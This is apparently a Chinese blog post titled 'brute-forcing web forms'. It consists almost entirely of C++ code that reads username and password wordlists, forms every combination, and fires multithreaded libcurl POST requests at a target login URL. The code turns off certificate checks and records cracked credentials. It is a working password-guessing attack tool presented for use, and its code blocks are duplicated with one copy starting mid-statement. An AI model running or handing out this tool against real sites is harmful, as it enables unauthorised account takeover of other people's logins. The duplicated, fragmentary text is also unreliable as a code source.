暴力破解Web表单
图为我的思考方式:
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_INTENSITY |
FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
curl_global_init(CURL_GLOBAL_ALL);
SYSTEM_INFO info; // 根据CPU生成线程数
GetSystemInfo(&info);
vector< string> user(istream_iterator< string>(ifstream(userfilename.c_str())),istream_iterator< string>());
vector< string> pass(istream_iterator< string>(ifstream(passwordfilename.c_str())),istream_iterator< string>());
fstream filed(headerfilename);
while (!filed.eof())
{
char temp[4096]="";
filed.getline(temp,4096);
vecheader1.push_back(temp);
}
filed.close();
CWork::readpostdata(m_postdata);
CWork::readkeyword(keyword);
CWork::readurl(url);
vector<UserPass> obj_userpass;
for(size_t i=0;i!=user.size();i++)
{
for(size_t j=0;j!=pass.size();j++)
{
UserPass temp;
temp.user=user[i];
temp.pass=pass[j];
obj_userpass.push_back(temp);
}
}
string console_title;
CWork::maketitle(console_title,"帐号数量:",user.size());
CWork::maketitle(console_title,"密码数量:",pass.size());
CWork::maketitle(console_title,"共计次数:",obj_userpass.size());
wstring w_console_title=CWork::s2ws(console_title);
SetConsoleTitle(w_console_title.c_str());
user.clear();
pass.clear();
//////////////////////// 生成测试数据 ////////////////////////
if(obj_userpass.size()>=1)
{
pull_one_url(obj_userpass[0]);
ofstream out("第一次数据测试.txt",ios::app);
out<<sz_head<<endl<<endl;
out<<"--------分割性-----------"<<endl;
out<<sz_html<<endl;
out.close();
}
//////////////////////// 为了观察一下关键字,到底应该设置什么 ////////////////////////
int thread_num=info.dwNumberOfProcessors*2;
long current_pos=1;
long result=0;
int num_total=obj_userpass.size();
console_title+="已发送:";
while (1)
{
if (obj_userpass.size()<current_pos)
{
break;
}
vector<UserPass> obj;
CWork::allocateUserPass(obj,obj_userpass,current_pos,thread_num);
stringstream strStream;
strStream<<result;
string new_tile=console_title;
new_tile+=strStream.str();
if (szCount!=0)
{
new_tile+=" 已成功破解:";
stringstream strStream1;
strStream1<<szCount;
new_tile+=strStream1.str();
}
wstring w_console_title=CWork::s2ws(new_tile);
SetConsoleTitle(w_console_title.c_str());
thread_group threads;
int obj_num=obj.size();
for ( int i = 0; i!=obj_num; ++ i) {
result++;
threads.create_thread(boost::bind(&pull_one_url,obj[i]));
}
threads.join_all();
}
cout<<"所有密码全部查找完成"<<endl;
curl_global_cleanup();
FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
curl_global_init(CURL_GLOBAL_ALL);
SYSTEM_INFO info; // 根据CPU生成线程数
GetSystemInfo(&info);
vector< string> user(istream_iterator< string>(ifstream(userfilename.c_str())),istream_iterator< string>());
vector< string> pass(istream_iterator< string>(ifstream(passwordfilename.c_str())),istream_iterator< string>());
fstream filed(headerfilename);
while (!filed.eof())
{
char temp[4096]="";
filed.getline(temp,4096);
vecheader1.push_back(temp);
}
filed.close();
CWork::readpostdata(m_postdata);
CWork::readkeyword(keyword);
CWork::readurl(url);
vector<UserPass> obj_userpass;
for(size_t i=0;i!=user.size();i++)
{
for(size_t j=0;j!=pass.size();j++)
{
UserPass temp;
temp.user=user[i];
temp.pass=pass[j];
obj_userpass.push_back(temp);
}
}
string console_title;
CWork::maketitle(console_title,"帐号数量:",user.size());
CWork::maketitle(console_title,"密码数量:",pass.size());
CWork::maketitle(console_title,"共计次数:",obj_userpass.size());
wstring w_console_title=CWork::s2ws(console_title);
SetConsoleTitle(w_console_title.c_str());
user.clear();
pass.clear();
//////////////////////// 生成测试数据 ////////////////////////
if(obj_userpass.size()>=1)
{
pull_one_url(obj_userpass[0]);
ofstream out("第一次数据测试.txt",ios::app);
out<<sz_head<<endl<<endl;
out<<"--------分割性-----------"<<endl;
out<<sz_html<<endl;
out.close();
}
//////////////////////// 为了观察一下关键字,到底应该设置什么 ////////////////////////
int thread_num=info.dwNumberOfProcessors*2;
long current_pos=1;
long result=0;
int num_total=obj_userpass.size();
console_title+="已发送:";
while (1)
{
if (obj_userpass.size()<current_pos)
{
break;
}
vector<UserPass> obj;
CWork::allocateUserPass(obj,obj_userpass,current_pos,thread_num);
stringstream strStream;
strStream<<result;
string new_tile=console_title;
new_tile+=strStream.str();
if (szCount!=0)
{
new_tile+=" 已成功破解:";
stringstream strStream1;
strStream1<<szCount;
new_tile+=strStream1.str();
}
wstring w_console_title=CWork::s2ws(new_tile);
SetConsoleTitle(w_console_title.c_str());
thread_group threads;
int obj_num=obj.size();
for ( int i = 0; i!=obj_num; ++ i) {
result++;
threads.create_thread(boost::bind(&pull_one_url,obj[i]));
}
threads.join_all();
}
cout<<"所有密码全部查找完成"<<endl;
curl_global_cleanup();
void pull_one_url(UserPass obj)
{
bool m_true= true;
transform(keyword.begin(), keyword.end(), keyword.begin(), ::tolower); // 所有html代码,转化为小写
while(m_true)
{
string dddddd=m_postdata;
if(dddddd.empty())
{
cout<<"postdata中数据为空,线程马上退出"<<endl;
return;
}
if (url.empty()||url=="")
{
cout<<"attackurl.txt不存在,或url地址为空"<<endl;
return;
}
CURL *curl = curl_easy_init();
string m_url=url;
string header;
string html;
struct curl_slist *slist_header = NULL;
for ( int i=0;i!=vecheader1.size();i++)
{
slist_header = curl_slist_append(slist_header,vecheader1[i].c_str());
}
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, slist_header);
// 连接服务器和发送请求的超时设置,单位是毫秒
curl_easy_setopt(curl, CURLOPT_POST, 1);
// curl_easy_setopt(curl,CURLOPT_FOLLOWLOCATION,1);
curl_easy_setopt(curl,CURLOPT_TIMEOUT_MS,10000);
curl_easy_setopt(curl,CURLOPT_CONNECTTIMEOUT_MS,10000);
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1);
curl_easy_setopt(curl, CURLOPT_URL, url.c_str());
if(m_url.substr(0,5)=="https")
{
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
}
curl_easy_setopt(curl, CURLOPT_DNS_CACHE_TIMEOUT, 10000);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, 6000);
// curl_easy_setopt(curl, CURLOPT_VERBOSE,1);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, html_write_data);
CWork::replace(dddddd,"{0%}",obj.user.c_str());
CWork::replace(dddddd,"{1%}",obj.pass.c_str());
curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, dddddd.length()); // Content-Length:
curl_easy_setopt(curl,CURLOPT_POSTFIELDS,dddddd.c_str()); // post提交的数据
curl_easy_setopt(curl, CURLOPT_WRITEDATA, &html);
curl_easy_setopt(curl, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0");
curl_easy_setopt(curl, CURLOPT_HEADERFUNCTION, header_write_data);
curl_easy_setopt(curl, CURLOPT_WRITEHEADER, &header);
curl_easy_perform(curl); /* ignores error */
// curl_easy_getinfo(curl,CURLINFO_SIZE_DOWNLOAD,&html_num); // 返回的html文件大小
long http_code=0;
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &http_code);
// curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &m_time); // 总耗时
// curl_easy_getinfo(curl,CURLINFO_CONNECT_TIME, &connect_time); // 连接时间
// curl_easy_getinfo(curl,CURLINFO_NAMELOOKUP_TIME, &datatime); // dns查询时间
// curl_easy_getinfo(curl, CURLINFO_PRIMARY_IP, &IP); // ip地址
// CURLINFO_PRETRANSFER_TIME:从建立连接到准备传输所使用的时间;
// CURLINFO_STARTTRANSFER_TIME:从建立连接到传输开始所使用的时间;
// ptime now2 = microsec_clock::universal_time() + hours(8);
// boost::posix_time::millisec_posix_time_system_config::time_duration_type time_elapse = now2 - now1;
transform(header.begin(), header.end(), header.begin(), ::tolower); // 所有html代码,转化为小写
transform(html.begin(), html.end(), html.begin(), ::tolower); // 所有html代码,转化为小写
// 在这里对html代码进行转码,如果是utf8就转gb2312
if(header.find("utf")!=-1)
{
string gb2312html;
CWork::Utf8ToGb2312(html.c_str(),gb2312html);
html=gb2312html;
}
if (http_code==200||http_code==302)
{
if (html.find(keyword)==-1)
{
szCount++;
boost::mutex::scoped_lock lock(io_mutex);
ofstream out(result,ios::app);
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_GREEN);
out<<"恭喜!!! 用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
cout<<"http状态"<<http_code<<"密码破解成功1个 username:"<<obj.user<<" password:"<<obj.pass<<endl;
out.close();
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_INTENSITY |
FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
}
else
{
boost::mutex::scoped_lock lock(io_mutex);
cout<<"密码错误"<<" 线程ID: "<<boost::this_thread::get_id()<<" http_code:"<<setw(3)<<http_code<<" 用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
}
}
else
{
if(http_code==0)
{
boost::mutex::scoped_lock lock(io_mutex);
cout<<"超时马上重新连接"<<"用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
curl_easy_cleanup(curl);
continue;
}
boost::mutex::scoped_lock lock(io_mutex);
cout<<"密码错误"<<" 线程ID: "<<boost::this_thread::get_id()<<" http_code:"<<http_code<<" 用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
}
m_true= false;
curl_easy_cleanup(curl);
sz_html=html;
sz_head=header;
}
}
![]()
{
bool m_true= true;
transform(keyword.begin(), keyword.end(), keyword.begin(), ::tolower); // 所有html代码,转化为小写
while(m_true)
{
string dddddd=m_postdata;
if(dddddd.empty())
{
cout<<"postdata中数据为空,线程马上退出"<<endl;
return;
}
if (url.empty()||url=="")
{
cout<<"attackurl.txt不存在,或url地址为空"<<endl;
return;
}
CURL *curl = curl_easy_init();
string m_url=url;
string header;
string html;
struct curl_slist *slist_header = NULL;
for ( int i=0;i!=vecheader1.size();i++)
{
slist_header = curl_slist_append(slist_header,vecheader1[i].c_str());
}
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, slist_header);
// 连接服务器和发送请求的超时设置,单位是毫秒
curl_easy_setopt(curl, CURLOPT_POST, 1);
// curl_easy_setopt(curl,CURLOPT_FOLLOWLOCATION,1);
curl_easy_setopt(curl,CURLOPT_TIMEOUT_MS,10000);
curl_easy_setopt(curl,CURLOPT_CONNECTTIMEOUT_MS,10000);
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1);
curl_easy_setopt(curl, CURLOPT_URL, url.c_str());
if(m_url.substr(0,5)=="https")
{
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
}
curl_easy_setopt(curl, CURLOPT_DNS_CACHE_TIMEOUT, 10000);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, 6000);
// curl_easy_setopt(curl, CURLOPT_VERBOSE,1);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, html_write_data);
CWork::replace(dddddd,"{0%}",obj.user.c_str());
CWork::replace(dddddd,"{1%}",obj.pass.c_str());
curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, dddddd.length()); // Content-Length:
curl_easy_setopt(curl,CURLOPT_POSTFIELDS,dddddd.c_str()); // post提交的数据
curl_easy_setopt(curl, CURLOPT_WRITEDATA, &html);
curl_easy_setopt(curl, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0");
curl_easy_setopt(curl, CURLOPT_HEADERFUNCTION, header_write_data);
curl_easy_setopt(curl, CURLOPT_WRITEHEADER, &header);
curl_easy_perform(curl); /* ignores error */
// curl_easy_getinfo(curl,CURLINFO_SIZE_DOWNLOAD,&html_num); // 返回的html文件大小
long http_code=0;
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &http_code);
// curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &m_time); // 总耗时
// curl_easy_getinfo(curl,CURLINFO_CONNECT_TIME, &connect_time); // 连接时间
// curl_easy_getinfo(curl,CURLINFO_NAMELOOKUP_TIME, &datatime); // dns查询时间
// curl_easy_getinfo(curl, CURLINFO_PRIMARY_IP, &IP); // ip地址
// CURLINFO_PRETRANSFER_TIME:从建立连接到准备传输所使用的时间;
// CURLINFO_STARTTRANSFER_TIME:从建立连接到传输开始所使用的时间;
// ptime now2 = microsec_clock::universal_time() + hours(8);
// boost::posix_time::millisec_posix_time_system_config::time_duration_type time_elapse = now2 - now1;
transform(header.begin(), header.end(), header.begin(), ::tolower); // 所有html代码,转化为小写
transform(html.begin(), html.end(), html.begin(), ::tolower); // 所有html代码,转化为小写
// 在这里对html代码进行转码,如果是utf8就转gb2312
if(header.find("utf")!=-1)
{
string gb2312html;
CWork::Utf8ToGb2312(html.c_str(),gb2312html);
html=gb2312html;
}
if (http_code==200||http_code==302)
{
if (html.find(keyword)==-1)
{
szCount++;
boost::mutex::scoped_lock lock(io_mutex);
ofstream out(result,ios::app);
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_GREEN);
out<<"恭喜!!! 用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
cout<<"http状态"<<http_code<<"密码破解成功1个 username:"<<obj.user<<" password:"<<obj.pass<<endl;
out.close();
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_INTENSITY |
FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
}
else
{
boost::mutex::scoped_lock lock(io_mutex);
cout<<"密码错误"<<" 线程ID: "<<boost::this_thread::get_id()<<" http_code:"<<setw(3)<<http_code<<" 用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
}
}
else
{
if(http_code==0)
{
boost::mutex::scoped_lock lock(io_mutex);
cout<<"超时马上重新连接"<<"用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
curl_easy_cleanup(curl);
continue;
}
boost::mutex::scoped_lock lock(io_mutex);
cout<<"密码错误"<<" 线程ID: "<<boost::this_thread::get_id()<<" http_code:"<<http_code<<" 用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
}
m_true= false;
curl_easy_cleanup(curl);
sz_html=html;
sz_head=header;
}
}